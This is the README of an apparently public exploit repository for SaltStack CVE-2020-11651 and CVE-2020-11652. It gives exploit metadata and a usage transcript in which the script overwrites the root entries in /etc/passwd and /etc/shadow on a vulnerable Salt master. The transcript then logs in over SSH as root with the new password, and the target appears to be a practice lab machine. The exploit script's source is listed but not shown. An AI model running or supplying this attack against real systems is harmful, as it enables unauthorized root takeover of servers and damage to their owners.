A script that exploits SaltStack CVE-2020-11651 and CVE-2020-11652 to add new users to a vulnerable Salt master by injecting entries into /etc/passwd and /etc/shadow.# CVE-2020-11651
A script that exploits SaltStack CVE-2020-11651 and CVE-2020-11652 to add new users to a vulnerable Salt master by injecting entries into /etc/passwd and /etc/shadow.
```python
# Exploit Title: Saltstack 3000.1 - Remote Code Execution
# Date: 2020-05-04
# Orignal Exploit Author: Jasper Lievisse Adriaanse
# Modified Author: Drew Alleman
# Vendor Homepage: https://www.saltstack.com/
# Version: < 3000.2, < 2019.2.4, 2017.*, 2018.*
# Tested on: Debian 10 with Salt 2019.2.0
# CVE : CVE-2020-11651 and CVE-2020-11652
# Description: Saltstack authentication bypass/remote code execution
#
# Orignal Source: https://github.com/jasperla/CVE-2020-11651-poc
# Modified Source: https://github.com/Drew-Alleman/CVE-2020-11651
# This exploit is based on this checker script:
# https://github.com/rossengeorgiev/salt-security-backports
```
## Usage
```
$ python3 CVE-2020-11651-11652-add_user.py -m 192.168.158.62 --replace-root -d
[DEBUG] Auth Info Response: ['user', 'UserAuthenticationError', {'root': 'MpZiP+J3yTzjOQ+ILgZ7KN+os/Jadne3sLha7b7kNz2jLBxBC9hDlajSCObG/ZASPF1RfAr9Lrs='}, []]
[DEBUG] Connected to 192.168.158.62:4506
[DEBUG] Removing existing root line from /etc/passwd
[DEBUG] Removing existing root line from /etc/shadow
[DEBUG] Written to /etc/passwd
[DEBUG] Written to /etc/shadow
[INFO] User root:cvQ0OQaXOf8aYi0Ox*eKGPAQ created successfully.
┌──(.venv)─(drew㉿whitehat)-[~/OSCP_LIKE/Linux/Twiggy/exploits]
└─$ sshpass -p 'cvQ0OQaXOf8aYi0Ox*eKGPAQ' ssh root@192.168.158.62
Last login: Sun Mar 30 02:23:06 2025 from 192.168.45.180
[root@twiggy ~]# id
uid=0(root) gid=0(root) groups=0(root)
[root@twiggy ~]#
```
[4.0K] /data/pocs/5d2ea6af4396917b00453a73cf3094957cc80bb7
├── [8.0K] CVE-2020-11651-11652-add_user.py
└── [1.8K] README.md
0 directories, 2 files